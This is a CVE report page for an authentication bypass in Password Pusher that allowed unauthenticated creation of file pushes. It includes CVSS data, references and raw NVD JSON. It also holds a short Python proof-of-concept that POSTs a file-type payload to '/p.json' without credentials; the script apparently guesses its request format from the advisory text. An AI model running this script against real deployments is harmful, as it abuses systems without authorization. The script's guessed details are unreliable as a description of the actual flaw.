Security Vulnerability Report
CVE-2026-41308 CVSS 6.5 MEDIUM


Published: 2026-05-08 15:16:39
Last Modified: 2026-05-08 16:08:16

Description

Password Pusher is an open source application to communicate sensitive information over the web. Prior to versions 1.69.3 and 2.4.2, a security issue in OSS PasswordPusher allowed unauthenticated creation of file-type pushes through a generic JSON API create path under certain configurations. This could bypass the intended authentication boundary for file push creation. This issue has been patched in versions 1.69.3 and 2.4.2.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)


Password Pusher < 1.69.3
Password Pusher < 2.4.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import requests
import json

# Target configuration
target_host = "http://vulnerable-host.com"
api_endpoint = "/p.json"  # Generic JSON API create path mentioned in description

# Construct the payload for a file-type push
# Based on the description, the vulnerability allows unauthenticated file push creation
payload = {
    "password": {
        "payload": "<base64_encoded_file_content>",
        "note": "Unauthorized File Upload",
        "type": "file"
    }
}

headers = {
    "Content-Type": "application/json",
    "User-Agent": "CVE-2026-41308-Scanner"
}

print(f"[*] Attempting to exploit {target_host}{api_endpoint}...")

try:
    # Send POST request without authentication
    response = requests.post(target_host + api_endpoint,
                             data=json.dumps(payload),
                             headers=headers,
                             timeout=10)
    if response.status_code == 201 or response.status_code == 200:
        print("[+] Exploit successful! File push created without authentication.")
        print("[+] Response:")
        print(response.text)
    else:
        print(f"[-] Exploit failed. Status code: {response.status_code}")
        print(response.text)
except Exception as e:
    print(f"[-] An error occurred: {e}")
```

References

https://github.com/pglombardo/PasswordPusher/commit/45dc2512875231ef45ecd5dfc8c3c8185f882bf4
https://github.com/pglombardo/PasswordPusher/pull/4381
https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-qfh8-f79c-x86c

Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-41308",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-08T15:16:39.480",
    "lastModified": "2026-05-08T16:08:15.570",
    "vulnStatus": "Undergoing Analysis",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "Password Pusher is an open source application to communicate sensitive information over the web. Prior to versions 1.69.3 and 2.4.2, a security issue in OSS PasswordPusher allowed unauthenticated creation of file-type pushes through a generic JSON API create path under certain configurations. This could bypass the intended authentication boundary for file push creation. This issue has been patched in versions 1.69.3 and 2.4.2."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 2.5
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-288"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/pglombardo/PasswordPusher/commit/45dc2512875231ef45ecd5dfc8c3c8185f882bf4",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/pglombardo/PasswordPusher/pull/4381",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/pglombardo/PasswordPusher/security/advisories/GHSA-qfh8-f79c-x86c",
        "source": "[email protected]"
      }
    ]
  }
}
```